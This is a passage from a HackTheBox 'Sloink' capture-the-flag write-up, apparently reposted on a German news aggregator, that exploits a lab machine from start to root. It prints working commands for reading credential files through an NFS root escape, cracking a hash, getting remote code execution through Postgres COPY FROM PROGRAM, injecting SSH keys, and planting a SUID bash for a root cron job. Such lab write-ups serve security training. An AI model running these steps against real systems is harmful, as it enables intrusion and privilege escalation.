🔧 AI Nachrichten Major AI platforms go down in unprecedented simultaneous outage(03.09.2026 um 17:34 Uhr)
🔧 AI Nachrichten ChatGPT, Claude, and Grok Down? Users Report Widespread Outages(03.09.2026 um 19:14 Uhr)
🔧 AI Nachrichten OpenAI Launches GPT-6 Astra, Says We May Have Entered the AGI Era(03.09.2026 um 22:08 Uhr)
🔧 AI Nachrichten Claude Comes to CarPlay as Fifth Major AI Chatbot App(05.09.2026 um 05:31 Uhr)
🔧 AI Nachrichten OpenAI’s GPT-6 Astra Is AGI, Says NVIDIA CEO Jensen Huang(07.09.2026 um 06:31 Uhr)
🔧 AI Nachrichten Blame AI companies for Mac mini and Mac Studio shortage(31.08.2026 um 10:32 Uhr)
🔧 AI Nachrichten Major AI platforms go down in unprecedented simultaneous outage(03.09.2026 um 17:34 Uhr)
🔧 AI Nachrichten ChatGPT, Claude, and Grok Down? Users Report Widespread Outages(03.09.2026 um 19:14 Uhr)
🔧 AI Nachrichten OpenAI Launches GPT-6 Astra, Says We May Have Entered the AGI Era(03.09.2026 um 22:08 Uhr)
🔧 AI Nachrichten Claude Comes to CarPlay as Fifth Major AI Chatbot App(05.09.2026 um 05:31 Uhr)
🔧 AI Nachrichten OpenAI’s GPT-6 Astra Is AGI, Says NVIDIA CEO Jensen Huang(07.09.2026 um 06:31 Uhr)
🔧 AI Nachrichten Blame AI companies for Mac mini and Mac Studio shortage(31.08.2026 um 10:32 Uhr)

🔧 Programmierung 🕛 kürzlich 8 Min Lesezeit
0

HackTheBox: Sloink Writeup

↗ Quelle (dev.to)
🗣️ Stimme:
📑 Inhaltsübersicht




Summary



NFS shares exposed the target's home directory and PostgreSQL backups. The user's psql history contained an MD5 hash that cracked to service. SSH with that account drops you immediately (shell is /bin/false), but port forwarding still works - so we tunneled straight to the Postgres Unix socket and connected as the superuser. From there, COPY FROM PROGRAM gave us RCE as postgres. We injected our SSH key and got a shell. For root, a cron job running as root copies the entire Postgres data directory - which postgres owns. We dropped a SUID bash there, waited for the cron to fire, and root handed us a root shell.



Chain: NFS leak → MD5 crack → SSH tunnel → Postgres RCE → SSH key injection → postgres shell → SUID bash via cron → root









Recon






CODE
nmap -A -Pn 10.129.234.160 -oA nmap









CODE
PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13
111/tcp open rpcbind 2-4 (RPC #100000)
2049/tcp open nfs_acl 3 (RPC #100227)






NFS on 2049 is immediately interesting. We check what's exported:




CODE
showmount -e 10.129.234.160









CODE
Export list for 10.129.234.160:
/var/backups *
/home *






Both shares open to everyone (*). We mount them and enumerate:




CODE
mkdir -p /mnt/home /mnt/backups
mount -t nfs 10.129.234.160:/home /mnt/home
mount -t nfs 10.129.234.160:/var/backups /mnt/backups









CODE
find /mnt/backups -maxdepth 3 -ls
# → several archive-*.zip files (~4.5MB each, created every minute)

find /mnt/home -maxdepth 3 -ls
# → /mnt/home/service (UID 1337, permission denied)






We can't read the service home directory yet because our local UID doesn't match. We use NetExec to enumerate properly - it also detects a root escape vulnerability on the NFS server:




CODE
nxc nfs 10.129.234.160 --enum-shares









CODE
NFS  10.129.234.160  [*] Supported NFS versions: (3, 4) (root escape:True)
NFS 10.129.234.160 [+] /var/backups
NFS 10.129.234.160 0 r-- 4.5MB /var/backups/archive-2026-06-28T0446.zip
NFS 10.129.234.160 [+] /home
NFS 10.129.234.160 1337 r-- 90B /home/service/.bash_history
NFS 10.129.234.160 1337 r-- 326B /home/service/.psql_history
NFS 10.129.234.160 1337 r-- 96B /home/service/.ssh/authorized_keys
NFS 10.129.234.160 1337 r-- 96B /home/service/.ssh/id_ed25519.pub






The NFS root escape means we can traverse outside the share and read the whole filesystem. We use that to grab /etc/passwd and /etc/shadow:




CODE
nxc nfs 10.129.234.160 --get-file /etc/passwd passwd
nxc nfs 10.129.234.160 --get-file /etc/shadow shadow









CODE
cat passwd | grep bash
root:x:0:0:root:/root:/bin/bash
postgres:x:115:123:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

cat passwd | grep service
service:x:1337:1337:,,,,default password:/home/service:/bin/false






The service account has /bin/false as its shell - it can't get an interactive session. Also note the postgres user (UID 115) has a real bash shell.




CODE
grep '\$y\$' shadow
root:$y$j9T$nHJOa2A9rTXPQi3rqjrDI/$mbo9VYMotfEvj4Va5D7Lv0AOzdHRuMwGf.4nue0pZe3
service:$y$j9T$4gRKP9kqW6NvhFfcFU2mL/$KT6bU.KoVCaBDQjkmUIkni5qWJaCTzScIz4B8XwqT/7






Both hashes are yescrypt - slow to crack. We set those aside and focus on the NFS files.









Credential Discovery



To read the service home directory, we create a local user with matching UID:




CODE
groupadd -g 1337 servicegroup
useradd -u 1337 -g 1337 serviceuser
su serviceuser
cat /mnt/home/service/.bash_history









CODE
ls -lah /var/run/postgresql/
file /var/run/postgresql/.s.PGSQL.5432
psql -U postgres
exit






The bash history shows the service user connecting to postgres as the superuser via a Unix socket. We note the socket path: /var/run/postgresql/.s.PGSQL.5432.




CODE
cat /mnt/home/service/.psql_history









CODE
CREATE DATABASE service;
\c service;
CREATE TABLE users ( id SERIAL PRIMARY KEY, username VARCHAR(255) NOT NULL, password VARCHAR(255) NOT NULL, description TEXT);
INSERT INTO users (username, password, description)
VALUES ('service', 'aaabf0d39951f3e6c3e8a7911df524c2', 'network access account');
select * from users;
\q






There's an MD5 hash in the history. We crack it on CrackStation:




CODE
aaabf0d39951f3e6c3e8a7911df524c2  →  service






Confirmed — the password is service.









SSH Access






CODE
nxc ssh 10.129.24.180 -u service -p service









CODE
SSH  10.129.24.180  22  [+] service:service  Network Devices






Creds are valid. But when we actually SSH in:




CODE
ssh [email protected]
# (banner appears, then connection closes immediately)
Connection to 10.129.24.180 closed.






Expected - /bin/false kicks us out. But port forwarding doesn't need a shell. From the bash history we already know the Postgres Unix socket lives at /var/run/postgresql/.s.PGSQL.5432. We forward a local TCP port to that socket path on the remote:




CODE
ssh -N -L 5432:/var/run/postgresql/.s.PGSQL.5432 [email protected]






The format is local_port:remote_socket_path - SSH listens on port 5432 locally and relays any connection through to the Unix socket on the server side. This runs in the background. In a new terminal:




CODE
psql -h localhost -p 5432 -U postgres









CODE
psql (18.3, server 14.19)
postgres=#






We're in as the Postgres superuser with no password - the database is configured to trust local connections.









PostgreSQL Enumeration & RCE






CODE
postgres=# \du









CODE
 Role name |                         Attributes
-----------+------------------------------------------------------------
postgres | Superuser, Create role, Create DB, Replication, Bypass RLS






Full superuser. We check the databases and find the service db:




CODE
postgres=# \c service
postgres=# select * from users;









CODE
 id | username |             password             |      description
----+----------+----------------------------------+------------------------
1 | service | aaabf0d39951f3e6c3e8a7911df524c2 | network access account






Nothing new. But as a superuser we can run OS commands:




CODE
create table cmd(output text);
copy cmd from program 'id';
select * from cmd;









CODE
 uid=115(postgres) gid=123(postgres) groups=123(postgres),122(ssl-cert)






RCE confirmed. We inject our SSH public key into the postgres home directory:




CODE
copy cmd from program 'mkdir -p /var/lib/postgresql/.ssh';
copy cmd from program 'chmod 700 /var/lib/postgresql/.ssh';
COPY cmd FROM PROGRAM 'echo "ssh-ed25519 AAAA...snip... kali@kali" > /var/lib/postgresql/.ssh/authorized_keys';
copy cmd from program 'chmod 600 /var/lib/postgresql/.ssh/authorized_keys';












Shell as postgres - User Flag






CODE
ssh -i /home/kali/.ssh/id_ed25519 [email protected]









CODE
postgres@slonik:~$ id
uid=115(postgres) gid=123(postgres) groups=123(postgres),122(ssl-cert)

postgres@slonik:~$ cat user.txt
[REDACTED]












Privilege Escalation






Finding the cron job



First we run linpeas to get a broad picture of the system. A few things stand out:




CODE
╔══════════╣ Backup folders
drwxr-xr-x 3 root root 4096 Oct 23 2023 /opt/backups
-rwxr-xr-x 1 root root 392 Oct 24 2023 /usr/bin/backup ← custom backup script

╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 274 Sep 25 2021 /usr/lib/systemd/system/[email protected]
-rw-r--r-- 1 root root 436 Sep 25 2021 /usr/lib/systemd/system/[email protected]






We cat /usr/bin/backup and see it runs pg_basebackup to copy the Postgres data directory as root, then zips it up. Linpeas didn't tell us when or how often it runs though — no obvious crontab entry was shown. So we pull in pspy64 to watch for the process in real time:




CODE
./pspy64









CODE
2026/06/28 09:04:01 CMD: UID=0  | /bin/sh -c /usr/bin/backup
2026/06/28 09:04:01 CMD: UID=0 | /bin/bash /usr/bin/backup
2026/06/28 09:04:02 CMD: UID=0 | /usr/lib/postgresql/14/bin/pg_basebackup -h /var/run/postgresql -U postgres -D /opt/backups/current/






Root runs /usr/bin/backup every minute. Looking back at the script:




CODE
#!/bin/bash
date=$(/usr/bin/date +"%FT%H%M")
/usr/bin/rm -rf /opt/backups/current/*
/usr/bin/pg_basebackup -h /var/run/postgresql -U postgres -D /opt/backups/current/
/usr/bin/zip -r "/var/backups/archive-$date.zip" /opt/backups/current/

count=$(/usr/bin/find "/var/backups/" -maxdepth 1 -type f -o -type d | /usr/bin/wc -l)
if [ "$count" -gt 10 ]; then
/usr/bin/rm -rf /var/backups/*
fi






It wipes /opt/backups/current/, then uses pg_basebackup to copy the Postgres data directory (/var/lib/postgresql/14/main/) into it - running as root. The data directory is owned by postgres, so we can put anything we want in there before the cron fires.






The exploit



We copy bash into the data directory with the SUID bit set:




CODE
postgres@slonik:~/14/main$ cp /bin/bash cbash
postgres@slonik:~/14/main$ chmod +s cbash






Wait up to a minute for the cron. When it fires, root copies everything including our SUID bash:




CODE
postgres@slonik:~/14/main$ ls -lah /opt/backups/current/cbash
-rwsr-sr-x 1 root root 1.4M Jun 28 09:32 cbash






Owner is root, SUID bit is set. We run it with -p to keep the elevated privileges:




CODE
postgres@slonik:/opt/backups/current$ ./cbash -p
cbash-5.1# whoami
root
cbash-5.1# cat /root/root.txt
[REDACTED]












Attack Chain






CODE
NFS world-readable shares

Read /home/service/.psql_history (UID spoof)

MD5 hash → password: service

SSH port forward (bypasses /bin/false)

Postgres superuser via Unix socket tunnel

COPY FROM PROGRAM → RCE as postgres

SSH key injection → stable shell + user.txt

postgres owns data dir → drop SUID bash

Root cron copies SUID bash → root.txt









Key Vulnerabilities
































Vulnerability Where
NFS exported with * and no root_squash
/etc/exports
MD5 hash stored in shell history /home/service/.psql_history
Postgres superuser with no password (trust auth) pg_hba.conf
SSH port forwarding not restricted for /bin/false accounts sshd_config
Root cron copies from postgres-owned directory, preserving SUID /usr/bin/backup
Vollständiger Original-Bericht
Ausführliche Details, Code-Beispiele & Hersteller-Stellungnahme auf dev.to.
↗ Original-Artikel auf dev.to lesen
Wie bewertest du diesen Beitrag?
1 Klick Feedback
Teilen mit Netzwerk & Team:

Community-Analysen & Experten-Meinungen 0

Verfasse deine eigene Analyse, teile Workarounds oder diskutiere diesen Vorfall im Blog.
Noch keine Community-Analyse verfasst. Markiere einen Textabschnitt oder klicke oben auf Eigene Analyse verfassen“!
Community Pulse: Relevanz-Einschätzung
1 Klick Experten-Votum
🔴 Akute Relevanz 0%
🟡 In Evaluierung 0%
🟢 Keine Auswirkung 0%
Spannende Innovation 0%
Verwandte Story-Cluster & Quellen (Vektor-KI)
Port 8095 Engine
3 Quellen
GPT-6 Astra Release Today? OpenAI’s Next Major AI Model Is Almost Here
1 Quelle
Apple accuses OpenAI of destroying evidence as trade-secrets fight intensifies
1 Quelle
Major AI platforms go down in unprecedented simultaneous outage
Ähnliche Beiträge
🔍 Verwandte News

Auch interessante Nachrichten HackTheBox: Sloink Writeup

Thematisch verwandte Begriffe: HackTheBox, Sloink, Writeup · 6 Treffer

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...